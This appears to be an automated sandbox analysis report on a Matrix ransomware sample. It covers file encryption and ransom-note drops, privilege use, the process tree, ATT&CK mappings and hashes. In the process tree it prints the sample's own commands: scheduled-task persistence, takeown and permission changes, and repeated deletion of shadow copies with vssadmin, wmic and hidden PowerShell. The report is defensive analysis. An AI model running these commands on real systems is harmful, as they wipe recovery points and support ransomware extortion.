0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\onenote.x-none.msi.16.x-none.vreg.dat 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\TrebuchetMs.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\error-icon.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.White.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.JPG 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\hijrah-config-umalqura.properties 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5664 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6496 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1636 powershell.exe 1636 powershell.exe 1636 powershell.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe 5372 deNx4JD364.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5372 deNx4JD364.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 1636 powershell.exe Token: SeTakeOwnershipPrivilege 5084 takeown.exe Token: SeDebugPrivilege 5372 deNx4JD364.exe Token: SeLoadDriverPrivilege 5372 deNx4JD364.exe Token: SeBackupPrivilege 5456 vssvc.exe Token: SeRestorePrivilege 5456 vssvc.exe Token: SeAuditPrivilege 5456 vssvc.exe Token: SeIncreaseQuotaPrivilege 6288 WMIC.exe Token: SeSecurityPrivilege 6288 WMIC.exe Token: SeTakeOwnershipPrivilege 6288 WMIC.exe Token: SeLoadDriverPrivilege 6288 WMIC.exe Token: SeSystemProfilePrivilege 6288 WMIC.exe Token: SeSystemtimePrivilege 6288 WMIC.exe Token: SeProfSingleProcessPrivilege 6288 WMIC.exe Token: SeIncBasePriorityPrivilege 6288 WMIC.exe Token: SeCreatePagefilePrivilege 6288 WMIC.exe Token: SeBackupPrivilege 6288 WMIC.exe Token: SeRestorePrivilege 6288 WMIC.exe Token: SeShutdownPrivilege 6288 WMIC.exe Token: SeDebugPrivilege 6288 WMIC.exe Token: SeSystemEnvironmentPrivilege 6288 WMIC.exe Token: SeRemoteShutdownPrivilege 6288 WMIC.exe Token: SeUndockPrivilege 6288 WMIC.exe Token: SeManageVolumePrivilege 6288 WMIC.exe Token: 33 6288 WMIC.exe Token: 34 6288 WMIC.exe Token: 35 6288 WMIC.exe Token: 36 6288 WMIC.exe Token: SeIncreaseQuotaPrivilege 6288 WMIC.exe Token: SeSecurityPrivilege 6288 WMIC.exe Token: SeTakeOwnershipPrivilege 6288 WMIC.exe Token: SeLoadDriverPrivilege 6288 WMIC.exe Token: SeSystemProfilePrivilege 6288 WMIC.exe Token: SeSystemtimePrivilege 6288 WMIC.exe Token: SeProfSingleProcessPrivilege 6288 WMIC.exe Token: SeIncBasePriorityPrivilege 6288 WMIC.exe Token: SeCreatePagefilePrivilege 6288 WMIC.exe Token: SeBackupPrivilege 6288 WMIC.exe Token: SeRestorePrivilege 6288 WMIC.exe Token: SeShutdownPrivilege 6288 WMIC.exe Token: SeDebugPrivilege 6288 WMIC.exe Token: SeSystemEnvironmentPrivilege 6288 WMIC.exe Token: SeRemoteShutdownPrivilege 6288 WMIC.exe Token: SeUndockPrivilege 6288 WMIC.exe Token: SeManageVolumePrivilege 6288 WMIC.exe Token: 33 6288 WMIC.exe Token: 34 6288 WMIC.exe Token: 35 6288 WMIC.exe Token: 36 6288 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1348 wrote to memory of 2576 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 86 PID 1348 wrote to memory of 2576 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 86 PID 1348 wrote to memory of 2576 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 86 PID 1348 wrote to memory of 4288 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 89 PID 1348 wrote to memory of 4288 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 89 PID 1348 wrote to memory of 4288 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 89 PID 1348 wrote to memory of 5072 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 95 PID 1348 wrote to memory of 5072 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 95 PID 1348 wrote to memory of 5072 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 95 PID 5072 wrote to memory of 1636 5072 cmd.exe 97 PID 5072 wrote to memory of 1636 5072 cmd.exe 97 PID 5072 wrote to memory of 1636 5072 cmd.exe 97 PID 1348 wrote to memory of 3944 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 103 PID 1348 wrote to memory of 3944 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 103 PID 1348 wrote to memory of 3944 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 103 PID 1348 wrote to memory of 536 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 100 PID 1348 wrote to memory of 536 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 100 PID 1348 wrote to memory of 536 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 100 PID 3944 wrote to memory of 4272 3944 cmd.exe 104 PID 3944 wrote to memory of 4272 3944 cmd.exe 104 PID 3944 wrote to memory of 4272 3944 cmd.exe 104 PID 3944 wrote to memory of 1220 3944 cmd.exe 106 PID 3944 wrote to memory of 1220 3944 cmd.exe 106 PID 3944 wrote to memory of 1220 3944 cmd.exe 106 PID 536 wrote to memory of 3544 536 cmd.exe 105 PID 536 wrote to memory of 3544 536 cmd.exe 105 PID 536 wrote to memory of 3544 536 cmd.exe 105 PID 1348 wrote to memory of 1884 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 107 PID 1348 wrote to memory of 1884 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 107 PID 1348 wrote to memory of 1884 1348 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 107 PID 3944 wrote to memory of 4848 3944 cmd.exe 109 PID 3944 wrote to memory of 4848 3944 cmd.exe 109 PID 3944 wrote to memory of 4848 3944 cmd.exe 109 PID 1884 wrote to memory of 5788 1884 cmd.exe 111 PID 1884 wrote to memory of 5788 1884 cmd.exe 111 PID 1884 wrote to memory of 5788 1884 cmd.exe 111 PID 1884 wrote to memory of 1620 1884 cmd.exe 112 PID 1884 wrote to memory of 1620 1884 cmd.exe 112 PID 1884 wrote to memory of 1620 1884 cmd.exe 112 PID 1884 wrote to memory of 5084 1884 cmd.exe 113 PID 1884 wrote to memory of 5084 1884 cmd.exe 113 PID 1884 wrote to memory of 5084 1884 cmd.exe 113 PID 1884 wrote to memory of 5448 1884 cmd.exe 114 PID 1884 wrote to memory of 5448 1884 cmd.exe 114 PID 1884 wrote to memory of 5448 1884 cmd.exe 114 PID 5448 wrote to memory of 5356 5448 cmd.exe 115 PID 5448 wrote to memory of 5356 5448 cmd.exe 115 PID 5448 wrote to memory of 5356 5448 cmd.exe 115 PID 5356 wrote to memory of 5372 5356 deNx4JD3.exe 116 PID 5356 wrote to memory of 5372 5356 deNx4JD3.exe 116 PID 3544 wrote to memory of 2024 3544 wscript.exe 117 PID 3544 wrote to memory of 2024 3544 wscript.exe 117 PID 3544 wrote to memory of 2024 3544 wscript.exe 117 PID 2024 wrote to memory of 5664 2024 cmd.exe 119 PID 2024 wrote to memory of 5664 2024 cmd.exe 119 PID 2024 wrote to memory of 5664 2024 cmd.exe 119 PID 3544 wrote to memory of 5168 3544 wscript.exe 122 PID 3544 wrote to memory of 5168 3544 wscript.exe 122 PID 3544 wrote to memory of 5168 3544 wscript.exe 122 PID 5168 wrote to memory of 5668 5168 cmd.exe 124 PID 5168 wrote to memory of 5668 5168 cmd.exe 124 PID 5168 wrote to memory of 5668 5168 cmd.exe 124 PID 3852 wrote to memory of 6496 3852 cmd.exe 128 PID 3852 wrote to memory of 6496 3852 cmd.exe 128 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5788 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe"2⤵PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe"C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe" -n2⤵
- Executes dropped EXE
PID:4288
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\UFrt0rZT.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\u5mj7pqS.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\u5mj7pqS.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5664
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:5168 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5668
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SLqXTAxH.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SLqXTAxH.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4272
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1220
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqfnvbJW.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:5788
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:1620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c deNx4JD3.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exedeNx4JD3.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5356 -
C:\Users\Admin\AppData\Local\Temp\deNx4JD364.exedeNx4JD3.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:6496
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵PID:5772
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf
Filesize8KB
MD5e5720e85c0334d00409489fcf02415e1
SHA1559cef48e61847b2963910fe2cd508ecdcad8d90
SHA25659df2d7061ab9040b0ed74167608961ebcd62e9735215994e97a7cc1d217a84d
SHA5126e7508246c44b785a7c45fdcca9c53790ad2c70d74bcdc9429cc6105a78471930792cb84aeaaf9384f1d70fe8702d614aaa9f6b9f64d0a80547b9f543cbe4b60
-
Filesize
1.2MB
MD576b640aa00354e46b29ca7ac2adfd732
SHA1afebf9d72ba7186afefebf4deda87675621b0b8b
SHA2560b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
Filesize
1.2MB
MD576b640aa00354e46b29ca7ac2adfd732
SHA1afebf9d72ba7186afefebf4deda87675621b0b8b
SHA2560b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
Filesize
1.2MB
MD576b640aa00354e46b29ca7ac2adfd732
SHA1afebf9d72ba7186afefebf4deda87675621b0b8b
SHA2560b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
11KB
MD5aad8088e049bce8d5ede9ba75457a29b
SHA14f153e7744bdb8cb43f90d77cf3558680d4d4885
SHA256da0b63266e25798dd4d2f34dddb675f6ce8669aef1993faf8daf03525fa53ee0
SHA512808879b34453d1217f3a870e681eee32def71a26d96c28425f764b69c5b0f27714c495b37747e9224bd8185f21ff6402dce04140b8108087b570006eb35435e7
-
Filesize
313B
MD5decadd863140ac6096da1d75ebaf62fd
SHA1fefc860477557bbb154c4675545079cc188c05ba
SHA256b9548694825ae74f94db4c036d82c3d319a0e87897b8379d7ff136752933e1f9
SHA512b1bf26cf037586a62d4cc7f01f2c5eeb37d22ca813dd9ba6962d032384fdbf29295fc3e0e687fa598b7296a1ef0c07ed5f177d5fb37878721076807cd5384ab7
-
Filesize
453B
MD502b75312940c939da94d2cd14e149e03
SHA12e1e62915e62bb2ae5ddeb2b4d6d5074e432061b
SHA256304ed98edcbea5c044783653506473ae4b9caa9ab8172cf9227744a34c45da88
SHA512e4e6021177c582705eed75334d617a7fddf65a1e62102b210c56bf7404a40b232da0317e757f5029d7d30463cb598a62f2558f541d06dafa25e5f6e6c60f6a2d
-
Filesize
246B
MD56d4f752d230ddbc7994c29932229f24f
SHA18e7c693071b83fe35708120f0da2224fc206e05e
SHA25698c94d0f9f2c044c27596af4a614eddb1eb84fbf7df027947e5f7d1b4451cc92
SHA512a6cc14df3ad5ed5cba0d8a5532af5584b0fac998408fe0c01aa787c2a90af052b724496585a783326867dd7ae8265c7d66c845855bc003e21c13bc0aa9e23a15
-
Filesize
415B
MD557bf19031b901feb10fcf3b0cf60813d
SHA119a4decb700557f08b5ea4b55377d7f368f48320
SHA25614cae52128179d2ac677bf36be68934a1371015ba2608be2abb76babdcc3c107
SHA512f6b6ccd68c1e531159083846fb61e6ac5ef65c815cce7754d0d9376f0d22c19dc962dd17ec10e7ac34e8d73bee2907fa2e7cfb9bdc4232ec7d7a00a7698e332b
-
Filesize
260B
MD59770d9f4d69d7bf088bf324bad7a252b
SHA185723b29aa7381790db5c599e9020086ff0cc887
SHA256dc433118017997f97ac70338d340261c43fc5b65a5a9f5c6270aa856cc325f7c
SHA512c035932f8db6fc3f0479b03f1eb57b5f4af30bc022544f0a16ccfbf56a475c7e266b580e75f0e1927e92f988d204bf7994f06c2d49c49b0aea14de620cf3e044